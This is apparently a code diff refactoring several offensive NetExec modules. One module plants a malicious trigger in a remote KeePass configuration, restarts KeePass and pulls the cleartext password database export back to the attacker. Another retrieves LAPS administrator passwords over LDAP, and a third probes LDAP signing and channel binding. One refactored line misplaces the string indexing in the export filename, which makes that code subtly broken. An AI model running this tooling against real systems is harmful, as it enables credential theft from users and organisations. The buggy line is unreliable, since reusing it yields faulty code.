def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
r"""
|
||||||
ACTION (mandatory) Performs one of the following actions, specified by the user:
|
ACTION (mandatory) Performs one of the following actions, specified by the user:
|
||||||
ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file
|
ADD insert a new malicious trigger into KEEPASS_CONFIG_PATH's specified file
|
||||||
CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's
|
CHECK check if a malicious trigger is currently set in KEEPASS_CONFIG_PATH's
|
||||||
|
@ -74,7 +74,7 @@ class NXCModule:
|
||||||
USER Targeted user running KeePass, used to restart the appropriate process
|
USER Targeted user running KeePass, used to restart the appropriate process
|
||||||
(used by RESTART action)
|
(used by RESTART action)
|
||||||
|
|
||||||
EXPORT_NAME Name fo the database export file, default: export.xml
|
EXPORT_NAME Name of the database export file, default: export.xml
|
||||||
EXPORT_PATH Path where to export the KeePass database in cleartext
|
EXPORT_PATH Path where to export the KeePass database in cleartext
|
||||||
default: C:\\Users\\Public, %APPDATA% works well too for user permissions
|
default: C:\\Users\\Public, %APPDATA% works well too for user permissions
|
||||||
|
|
||||||
|
@ -86,7 +86,6 @@ class NXCModule:
|
||||||
Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),
|
Not all variables used by the module are available as options (ex: trigger name, temp folder path, etc.),
|
||||||
but they can still be easily edited in the module __init__ code if needed
|
but they can still be easily edited in the module __init__ code if needed
|
||||||
"""
|
"""
|
||||||
|
|
||||||
if "ACTION" in module_options:
|
if "ACTION" in module_options:
|
||||||
if module_options["ACTION"] not in [
|
if module_options["ACTION"] not in [
|
||||||
"ADD",
|
"ADD",
|
||||||
|
@ -98,12 +97,12 @@ class NXCModule:
|
||||||
"ALL",
|
"ALL",
|
||||||
]:
|
]:
|
||||||
context.log.fail("Unrecognized action, use --options to list available parameters")
|
context.log.fail("Unrecognized action, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
else:
|
else:
|
||||||
self.action = module_options["ACTION"]
|
self.action = module_options["ACTION"]
|
||||||
else:
|
else:
|
||||||
context.log.fail("Missing ACTION option, use --options to list available parameters")
|
context.log.fail("Missing ACTION option, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
if "KEEPASS_CONFIG_PATH" in module_options:
|
if "KEEPASS_CONFIG_PATH" in module_options:
|
||||||
self.keepass_config_path = module_options["KEEPASS_CONFIG_PATH"]
|
self.keepass_config_path = module_options["KEEPASS_CONFIG_PATH"]
|
||||||
|
@ -120,7 +119,7 @@ class NXCModule:
|
||||||
if "PSH_EXEC_METHOD" in module_options:
|
if "PSH_EXEC_METHOD" in module_options:
|
||||||
if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]:
|
if module_options["PSH_EXEC_METHOD"] not in ["ENCODE", "PS1"]:
|
||||||
context.log.fail("Unrecognized powershell execution method, use --options to list available parameters")
|
context.log.fail("Unrecognized powershell execution method, use --options to list available parameters")
|
||||||
exit(1)
|
sys.exit(1)
|
||||||
else:
|
else:
|
||||||
self.powershell_exec_method = module_options["PSH_EXEC_METHOD"]
|
self.powershell_exec_method = module_options["PSH_EXEC_METHOD"]
|
||||||
|
|
||||||
|
@ -141,7 +140,6 @@ class NXCModule:
|
||||||
|
|
||||||
def add_trigger(self, context, connection):
|
def add_trigger(self, context, connection):
|
||||||
"""Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1"""
|
"""Add a malicious trigger to a remote KeePass config file using the powershell script AddKeePassTrigger.ps1"""
|
||||||
|
|
||||||
# check if the specified KeePass configuration file exists
|
# check if the specified KeePass configuration file exists
|
||||||
if self.trigger_added(context, connection):
|
if self.trigger_added(context, connection):
|
||||||
context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping")
|
context.log.display(f"The specified configuration file {self.keepass_config_path} already contains a trigger called '{self.trigger_name}', skipping")
|
||||||
|
@ -171,14 +169,13 @@ class NXCModule:
|
||||||
|
|
||||||
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
|
# checks if the malicious trigger was effectively added to the specified KeePass configuration file
|
||||||
if self.trigger_added(context, connection):
|
if self.trigger_added(context, connection):
|
||||||
context.log.success(f"Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
|
context.log.success("Malicious trigger successfully added, you can now wait for KeePass reload and poll the exported files")
|
||||||
else:
|
else:
|
||||||
context.log.fail(f"Unknown error when adding malicious trigger to file")
|
context.log.fail("Unknown error when adding malicious trigger to file")
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
def check_trigger_added(self, context, connection):
|
def check_trigger_added(self, context, connection):
|
||||||
"""check if the trigger is added to the config file XML tree"""
|
"""Check if the trigger is added to the config file XML tree"""
|
||||||
|
|
||||||
if self.trigger_added(context, connection):
|
if self.trigger_added(context, connection):
|
||||||
context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
|
context.log.display(f"Malicious trigger '{self.trigger_name}' found in '{self.keepass_config_path}'")
|
||||||
else:
|
else:
|
||||||
|
@ -186,20 +183,19 @@ class NXCModule:
|
||||||
|
|
||||||
def restart(self, context, connection):
|
def restart(self, context, connection):
|
||||||
"""Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1
|
"""Force the restart of KeePass process using a Windows service defined using the powershell script RestartKeePass.ps1
|
||||||
If multiple process belonging to different users are running simultaneously,
|
|
||||||
relies on the USER option to choose which one to restart"""
|
|
||||||
|
|
||||||
|
If multiple process belonging to different users are running simultaneously, relies on the USER option to choose which one to restart
|
||||||
|
"""
|
||||||
# search for keepass processes
|
# search for keepass processes
|
||||||
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
|
search_keepass_process_command_str = 'powershell.exe "Get-Process keepass* -IncludeUserName | Select-Object -Property Id,UserName,ProcessName | ConvertTo-CSV -NoTypeInformation"'
|
||||||
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
|
search_keepass_process_output_csv = connection.execute(search_keepass_process_command_str, True)
|
||||||
# we return the powershell command as a CSV for easier column parsing
|
|
||||||
csv_reader = reader(search_keepass_process_output_csv.split("\n"), delimiter=",")
|
# we return the powershell command as a CSV for easier column parsing, skipping the header line
|
||||||
next(csv_reader) # to skip the header line
|
csv_reader = reader(search_keepass_process_output_csv.split("\n")[1:], delimiter=",")
|
||||||
keepass_process_list = list(csv_reader)
|
|
||||||
# check if multiple processes belonging to different users are running (in order to choose which one to restart)
|
# check if multiple processes belonging to different users are running (in order to choose which one to restart)
|
||||||
keepass_users = []
|
keepass_users = [process[1] for process in list(csv_reader)]
|
||||||
for process in keepass_process_list:
|
|
||||||
keepass_users.append(process[1])
|
|
||||||
if len(keepass_users) == 0:
|
if len(keepass_users) == 0:
|
||||||
context.log.fail("No running KeePass process found, aborting restart")
|
context.log.fail("No running KeePass process found, aborting restart")
|
||||||
return
|
return
|
||||||
|
@ -223,7 +219,7 @@ class NXCModule:
|
||||||
context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one")
|
context.log.fail("Multiple KeePass processes were found, please specify parameter USER to target one")
|
||||||
return
|
return
|
||||||
|
|
||||||
context.log.display("Restarting {}'s KeePass process".format(keepass_users[0]))
|
context.log.display(f"Restarting {keepass_users[0]}'s KeePass process")
|
||||||
|
|
||||||
# prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)
|
# prepare the restarting script based on user-specified parameters (e.g: keepass user, etc)
|
||||||
# see data/keepass_trigger_module/RestartKeePass.ps1
|
# see data/keepass_trigger_module/RestartKeePass.ps1
|
||||||
|
@ -234,27 +230,28 @@ class NXCModule:
|
||||||
# actually performs the restart on the remote target
|
# actually performs the restart on the remote target
|
||||||
if self.powershell_exec_method == "ENCODE":
|
if self.powershell_exec_method == "ENCODE":
|
||||||
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8")
|
restart_keepass_script_b64 = b64encode(self.restart_keepass_script_str.encode("UTF-16LE")).decode("utf-8")
|
||||||
restart_keepass_script_cmd = "powershell.exe -e {}".format(restart_keepass_script_b64)
|
restart_keepass_script_cmd = f"powershell.exe -e {restart_keepass_script_b64}"
|
||||||
connection.execute(restart_keepass_script_cmd)
|
connection.execute(restart_keepass_script_cmd)
|
||||||
elif self.powershell_exec_method == "PS1":
|
elif self.powershell_exec_method == "PS1":
|
||||||
try:
|
try:
|
||||||
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
|
self.put_file_execute_delete(context, connection, self.restart_keepass_script_str)
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while restarting KeePass: {}".format(e))
|
context.log.fail(f"Error while restarting KeePass: {e}")
|
||||||
return
|
return
|
||||||
|
|
||||||
def poll(self, context, connection):
|
def poll(self, context, connection):
|
||||||
"""Search for the cleartext database export file in the specified export folder
|
"""Search for the cleartext database export file in the specified export folder
|
||||||
(until found, or manually exited by the user)"""
|
(until found, or manually exited by the user)
|
||||||
|
"""
|
||||||
found = False
|
found = False
|
||||||
context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient")
|
context.log.display(f"Polling for database export every {self.poll_frequency_seconds} seconds, please be patient")
|
||||||
context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything")
|
context.log.display("we need to wait for the target to enter his master password ! Press CTRL+C to abort and use clean option to cleanup everything")
|
||||||
# if the specified path is %APPDATA%, we need to check in every user's folder
|
# if the specified path is %APPDATA%, we need to check in every user's folder
|
||||||
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
||||||
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
|
poll_export_command_str = f"powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{self.export_name}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\""
|
||||||
else:
|
else:
|
||||||
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
||||||
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
|
poll_export_command_str = f'powershell.exe "if (Test-Path {export_full_path} -PathType leaf){{ Write-Output {export_full_path} }}"'
|
||||||
|
|
||||||
# we poll every X seconds until the export path is found on the remote machine
|
# we poll every X seconds until the export path is found on the remote machine
|
||||||
while not found:
|
while not found:
|
||||||
|
@ -263,7 +260,7 @@ class NXCModule:
|
||||||
print(".", end="", flush=True)
|
print(".", end="", flush=True)
|
||||||
sleep(self.poll_frequency_seconds)
|
sleep(self.poll_frequency_seconds)
|
||||||
continue
|
continue
|
||||||
print("")
|
print()
|
||||||
|
|
||||||
# once a database is found, downloads it to the attackers machine
|
# once a database is found, downloads it to the attackers machine
|
||||||
context.log.success("Found database export !")
|
context.log.success("Found database export !")
|
||||||
|
@ -274,29 +271,26 @@ class NXCModule:
|
||||||
connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write)
|
connection.conn.getFile(self.share, export_path.split(":")[1], buffer.write)
|
||||||
|
|
||||||
# if multiple exports found, add a number at the end of local path to prevent override
|
# if multiple exports found, add a number at the end of local path to prevent override
|
||||||
if count > 0:
|
local_full_path = f"{self.local_export_path}/{self.export_name.split('.'[0])}_{count!s}.{self.export_name.split('.'[1])}" if count > 0 else f"{self.local_export_path}/{self.export_name}"
|
||||||
local_full_path = self.local_export_path + "/" + self.export_name.split(".")[0] + "_" + str(count) + "." + self.export_name.split(".")[1]
|
|
||||||
else:
|
|
||||||
local_full_path = self.local_export_path + "/" + self.export_name
|
|
||||||
|
|
||||||
# downloads the exported database
|
# downloads the exported database
|
||||||
with open(local_full_path, "wb") as f:
|
with open(local_full_path, "wb") as f:
|
||||||
f.write(buffer.getbuffer())
|
f.write(buffer.getbuffer())
|
||||||
remove_export_command_str = "powershell.exe Remove-Item {}".format(export_path)
|
remove_export_command_str = f"powershell.exe Remove-Item {export_path}"
|
||||||
connection.execute(remove_export_command_str, True)
|
connection.execute(remove_export_command_str, True)
|
||||||
context.log.success('Moved remote "{}" to local "{}"'.format(export_path, local_full_path))
|
context.log.success(f'Moved remote "{export_path}" to local "{local_full_path}"')
|
||||||
found = True
|
found = True
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
context.log.fail("Error while polling export files, exiting : {}".format(e))
|
context.log.fail(f"Error while polling export files, exiting : {e}")
|
||||||
|
|
||||||
def clean(self, context, connection):
|
def clean(self, context, connection):
|
||||||
"""Checks for database export + malicious trigger on the remote host, removes everything"""
|
"""Checks for database export + malicious trigger on the remote host, removes everything"""
|
||||||
# if the specified path is %APPDATA%, we need to check in every user's folder
|
# if the specified path is %APPDATA%, we need to check in every user's folder
|
||||||
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
if self.export_path == "%APPDATA%" or self.export_path == "%appdata%":
|
||||||
poll_export_command_str = "powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\"".format(self.export_name)
|
poll_export_command_str = f"powershell.exe \"Get-LocalUser | Where {{ $_.Enabled -eq $True }} | select name | ForEach-Object {{ Write-Output ('C:\\Users\\'+$_.Name+'\\AppData\\Roaming\\{self.export_name}')}} | ForEach-Object {{ if (Test-Path $_ -PathType leaf){{ Write-Output $_ }}}}\""
|
||||||
else:
|
else:
|
||||||
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
export_full_path = f"'{self.export_path}\\{self.export_name}'"
|
||||||
poll_export_command_str = 'powershell.exe "if (Test-Path {} -PathType leaf){{ Write-Output {} }}"'.format(export_full_path, export_full_path)
|
poll_export_command_str = f'powershell.exe "if (Test-Path {export_full_path} -PathType leaf){{ Write-Output {export_full_path} }}"'
|
||||||
poll_export_command_output = connection.execute(poll_export_command_str, True)
|
poll_export_command_output = connection.execute(poll_export_command_str, True)
|
||||||
|
|
||||||
# deletes every export found on the remote machine
|
# deletes every export found on the remote machine
|
||||||
|
@ -352,7 +346,7 @@ class NXCModule:
|
||||||
self.extract_password(context)
|
self.extract_password(context)
|
||||||
|
|
||||||
def trigger_added(self, context, connection):
|
def trigger_added(self, context, connection):
|
||||||
"""check if the trigger is added to the config file XML tree (returns True/False)"""
|
"""Check if the trigger is added to the config file XML tree (returns True/False)"""
|
||||||
# check if the specified KeePass configuration file exists
|
# check if the specified KeePass configuration file exists
|
||||||
if not self.keepass_config_path:
|
if not self.keepass_config_path:
|
||||||
context.log.fail("No KeePass configuration file specified, exiting")
|
context.log.fail("No KeePass configuration file specified, exiting")
|
||||||
|
@ -372,19 +366,15 @@ class NXCModule:
|
||||||
sys.exit(1)
|
sys.exit(1)
|
||||||
|
|
||||||
# check if the specified KeePass configuration file does not already contain the malicious trigger
|
# check if the specified KeePass configuration file does not already contain the malicious trigger
|
||||||
for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"):
|
return any(trigger.find("Name").text == self.trigger_name for trigger in keepass_config_xml_root.findall(".//Application/TriggerSystem/Triggers/Trigger"))
|
||||||
if trigger.find("Name").text == self.trigger_name:
|
|
||||||
return True
|
|
||||||
|
|
||||||
return False
|
|
||||||
|
|
||||||
def put_file_execute_delete(self, context, connection, psh_script_str):
|
def put_file_execute_delete(self, context, connection, psh_script_str):
|
||||||
"""Helper to upload script to a temporary folder, run then deletes it"""
|
"""Helper to upload script to a temporary folder, run then deletes it"""
|
||||||
script_str_io = StringIO(psh_script_str)
|
script_str_io = StringIO(psh_script_str)
|
||||||
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read)
|
connection.conn.putFile(self.share, self.remote_temp_script_path.split(":")[1], script_str_io.read)
|
||||||
script_execute_cmd = "powershell.exe -ep Bypass -F {}".format(self.remote_temp_script_path)
|
script_execute_cmd = f"powershell.exe -ep Bypass -F {self.remote_temp_script_path}"
|
||||||
connection.execute(script_execute_cmd, True)
|
connection.execute(script_execute_cmd, True)
|
||||||
remove_remote_temp_script_cmd = 'powershell.exe "Remove-Item "{}""'.format(self.remote_temp_script_path)
|
remove_remote_temp_script_cmd = f'powershell.exe "Remove-Item "{self.remote_temp_script_path}""'
|
||||||
connection.execute(remove_remote_temp_script_cmd)
|
connection.execute(remove_remote_temp_script_cmd)
|
||||||
|
|
||||||
def extract_password(self, context):
|
def extract_password(self, context):
|
||||||
|
|
|
@ -1,9 +1,8 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import json
|
import json
|
||||||
|
|
||||||
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
from impacket.ldap import ldapasn1 as ldapasn1_impacket
|
||||||
from nxc.protocols.ldap.laps import LDAPConnect, LAPSv2Extract
|
from nxc.protocols.ldap.laps import LAPSv2Extract
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
@ -16,26 +15,20 @@ class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
|
||||||
name = "laps"
|
name = "laps"
|
||||||
description = "Retrieves the LAPS passwords"
|
description = "Retrieves all LAPS passwords which the account has read permissions for."
|
||||||
supported_protocols = ["ldap"]
|
supported_protocols = ["ldap"]
|
||||||
opsec_safe = True
|
opsec_safe = True
|
||||||
multiple_hosts = False
|
multiple_hosts = False
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *"""
|
||||||
COMPUTER Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *
|
|
||||||
"""
|
|
||||||
|
|
||||||
self.computer = None
|
self.computer = None
|
||||||
if "COMPUTER" in module_options:
|
if "COMPUTER" in module_options:
|
||||||
self.computer = module_options["COMPUTER"]
|
self.computer = module_options["COMPUTER"]
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
context.log.display("Getting LAPS Passwords")
|
context.log.display("Getting LAPS Passwords")
|
||||||
if self.computer is not None:
|
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.computer + "))" if self.computer is not None else "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))"
|
||||||
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*))(name=" + self.computer + "))"
|
|
||||||
else:
|
|
||||||
searchFilter = "(&(objectCategory=computer)(|(msLAPS-EncryptedPassword=*)(ms-MCS-AdmPwd=*)(msLAPS-Password=*)))"
|
|
||||||
attributes = [
|
attributes = [
|
||||||
"msLAPS-EncryptedPassword",
|
"msLAPS-EncryptedPassword",
|
||||||
"msLAPS-Password",
|
"msLAPS-Password",
|
||||||
|
@ -52,15 +45,7 @@ class NXCModule:
|
||||||
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in computer["attributes"]}
|
values = {str(attr["type"]).lower(): attr["vals"][0] for attr in computer["attributes"]}
|
||||||
if "mslaps-encryptedpassword" in values:
|
if "mslaps-encryptedpassword" in values:
|
||||||
msMCSAdmPwd = values["mslaps-encryptedpassword"]
|
msMCSAdmPwd = values["mslaps-encryptedpassword"]
|
||||||
d = LAPSv2Extract(
|
d = LAPSv2Extract(bytes(msMCSAdmPwd), connection.username if connection.username else "", connection.password if connection.password else "", connection.domain, connection.nthash if connection.nthash else "", connection.kerberos, connection.kdcHost, 339)
|
||||||
bytes(msMCSAdmPwd),
|
|
||||||
connection.username if connection.username else "",
|
|
||||||
connection.password if connection.password else "",
|
|
||||||
connection.domain,
|
|
||||||
connection.nthash if connection.nthash else "",
|
|
||||||
connection.kerberos,
|
|
||||||
connection.kdcHost,
|
|
||||||
339)
|
|
||||||
try:
|
try:
|
||||||
data = d.run()
|
data = d.run()
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
|
@ -78,6 +63,6 @@ class NXCModule:
|
||||||
|
|
||||||
laps_computers = sorted(laps_computers, key=lambda x: x[0])
|
laps_computers = sorted(laps_computers, key=lambda x: x[0])
|
||||||
for sAMAccountName, user, password in laps_computers:
|
for sAMAccountName, user, password in laps_computers:
|
||||||
context.log.highlight("Computer:{} User:{:<15} Password:{}".format(sAMAccountName, user, password))
|
context.log.highlight(f"Computer:{sAMAccountName} User:{user:<15} Password:{password}")
|
||||||
else:
|
else:
|
||||||
context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !")
|
context.log.fail("No result found with attribute ms-MCS-AdmPwd or msLAPS-Password !")
|
||||||
|
|
|
@ -1,5 +1,3 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
# -*- coding: utf-8 -*-
|
|
||||||
import socket
|
import socket
|
||||||
import ssl
|
import ssl
|
||||||
import asyncio
|
import asyncio
|
||||||
|
@ -12,6 +10,8 @@ from asyauth.common.credentials.ntlm import NTLMCredential
|
||||||
from asyauth.common.credentials.kerberos import KerberosCredential
|
from asyauth.common.credentials.kerberos import KerberosCredential
|
||||||
|
|
||||||
from asysocks.unicomm.common.target import UniTarget, UniProto
|
from asysocks.unicomm.common.target import UniTarget, UniProto
|
||||||
|
import sys
|
||||||
|
|
||||||
|
|
||||||
class NXCModule:
|
class NXCModule:
|
||||||
"""
|
"""
|
||||||
|
@ -28,10 +28,7 @@ class NXCModule:
|
||||||
multiple_hosts = True
|
multiple_hosts = True
|
||||||
|
|
||||||
def options(self, context, module_options):
|
def options(self, context, module_options):
|
||||||
"""
|
"""No options available."""
|
||||||
No options available.
|
|
||||||
"""
|
|
||||||
pass
|
|
||||||
|
|
||||||
def on_login(self, context, connection):
|
def on_login(self, context, connection):
|
||||||
# Conduct a bind to LDAPS and determine if channel
|
# Conduct a bind to LDAPS and determine if channel
|
||||||
|
@ -44,7 +41,7 @@ class NXCModule:
|
||||||
_, err = await ldapsClientConn.connect()
|
_, err = await ldapsClientConn.connect()
|
||||||
if err is not None:
|
if err is not None:
|
||||||
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
||||||
exit()
|
sys.exit()
|
||||||
_, err = await ldapsClientConn.bind()
|
_, err = await ldapsClientConn.bind()
|
||||||
if "data 80090346" in str(err):
|
if "data 80090346" in str(err):
|
||||||
return True # channel binding IS enforced
|
return True # channel binding IS enforced
|
||||||
|
@ -57,16 +54,16 @@ class NXCModule:
|
||||||
|
|
||||||
# Conduct a bind to LDAPS with channel binding supported
|
# Conduct a bind to LDAPS with channel binding supported
|
||||||
# but intentionally miscalculated. In the case that and
|
# but intentionally miscalculated. In the case that and
|
||||||
# LDAPS bind has without channel binding supported has occured,
|
# LDAPS bind has without channel binding supported has occurred,
|
||||||
# you can determine whether the policy is set to "never" or
|
# you can determine whether the policy is set to "never" or
|
||||||
# if it's set to "when supported" based on the potential
|
# if it's set to "when supported" based on the potential
|
||||||
# error recieved from the bind attempt.
|
# error received from the bind attempt.
|
||||||
async def run_ldaps_withEPA(target, credential):
|
async def run_ldaps_withEPA(target, credential):
|
||||||
ldapsClientConn = MSLDAPClientConnection(target, credential)
|
ldapsClientConn = MSLDAPClientConnection(target, credential)
|
||||||
_, err = await ldapsClientConn.connect()
|
_, err = await ldapsClientConn.connect()
|
||||||
if err is not None:
|
if err is not None:
|
||||||
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
context.log.fail("ERROR while connecting to " + str(connection.domain) + ": " + str(err))
|
||||||
exit()
|
sys.exit()
|
||||||
# forcing a miscalculation of the "Channel Bindings" av pair in Type 3 NTLM message
|
# forcing a miscalculation of the "Channel Bindings" av pair in Type 3 NTLM message
|
||||||
ldapsClientConn.cb_data = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
ldapsClientConn.cb_data = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
|
||||||
_, err = await ldapsClientConn.bind()
|
_, err = await ldapsClientConn.bind()
|
||||||
|
@ -123,15 +120,15 @@ class NXCModule:
|
||||||
_, err = await ldapsClientConn.bind()
|
_, err = await ldapsClientConn.bind()
|
||||||
if "stronger" in str(err):
|
if "stronger" in str(err):
|
||||||
return True # because LDAP server signing requirements ARE enforced
|
return True # because LDAP server signing requirements ARE enforced
|
||||||
elif ("data 52e" or "data 532") in str(err):
|
elif ("data 52e") in str(err):
|
||||||
context.log.fail("Not connected... exiting")
|
context.log.fail("Not connected... exiting")
|
||||||
exit()
|
sys.exit()
|
||||||
elif err is None:
|
elif err is None:
|
||||||
return False
|
return False
|
||||||
else:
|
else:
|
||||||
context.log.fail(str(err))
|
context.log.fail(str(err))
|
||||||
|
|
||||||
# Run trough all our code blocks to determine LDAP signing and channel binding settings.
|
# Run trough all our code blocks to determine LDAP signing and channel binding settings.
|
||||||
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
|
stype = asyauthSecret.PASS if not connection.nthash else asyauthSecret.NT
|
||||||
secret = connection.password if not connection.nthash else connection.nthash
|
secret = connection.password if not connection.nthash else connection.nthash
|
||||||
if not connection.kerberos:
|
if not connection.kerberos:
|
||||||
|
@ -142,15 +139,7 @@ class NXCModule:
|
||||||
stype=stype,
|
stype=stype,
|
||||||
)
|
)
|
||||||
else:
|
else:
|
||||||
kerberos_target = UniTarget(
|
kerberos_target = UniTarget(connection.hostname + "." + connection.domain, 88, UniProto.CLIENT_TCP, proxies=None, dns=None, dc_ip=connection.domain, domain=connection.domain)
|
||||||
connection.hostname + '.' + connection.domain,
|
|
||||||
88,
|
|
||||||
UniProto.CLIENT_TCP,
|
|
||||||
proxies=None,
|
|
||||||
dns=None,
|
|
||||||
dc_ip=connection.domain,
|
|
||||||
domain=connection.domain
|
|
||||||
)
|
|
||||||
credential = KerberosCredential(
|
credential = KerberosCredential(
|
||||||
target=kerberos_target,
|
target=kerberos_target,
|
||||||
secret=secret,
|
secret=secret,
|
||||||
|
@ -162,27 +151,27 @@ class NXCModule:
|
||||||
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
||||||
ldapIsProtected = asyncio.run(run_ldap(target, credential))
|
ldapIsProtected = asyncio.run(run_ldap(target, credential))
|
||||||
|
|
||||||
if ldapIsProtected == False:
|
if ldapIsProtected is False:
|
||||||
context.log.highlight("LDAP Signing NOT Enforced!")
|
context.log.highlight("LDAP Signing NOT Enforced!")
|
||||||
elif ldapIsProtected == True:
|
elif ldapIsProtected is True:
|
||||||
context.log.fail("LDAP Signing IS Enforced")
|
context.log.fail("LDAP Signing IS Enforced")
|
||||||
else:
|
else:
|
||||||
context.log.fail("Connection fail, exiting now")
|
context.log.fail("Connection fail, exiting now")
|
||||||
exit()
|
sys.exit()
|
||||||
|
|
||||||
if DoesLdapsCompleteHandshake(connection.host) == True:
|
if DoesLdapsCompleteHandshake(connection.host) is True:
|
||||||
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
target = MSLDAPTarget(connection.host, 636, UniProto.CLIENT_SSL_TCP, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
||||||
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
|
ldapsChannelBindingAlwaysCheck = asyncio.run(run_ldaps_noEPA(target, credential))
|
||||||
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
target = MSLDAPTarget(connection.host, hostname=connection.hostname, domain=connection.domain, dc_ip=connection.domain)
|
||||||
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
|
ldapsChannelBindingWhenSupportedCheck = asyncio.run(run_ldaps_withEPA(target, credential))
|
||||||
if ldapsChannelBindingAlwaysCheck == False and ldapsChannelBindingWhenSupportedCheck == True:
|
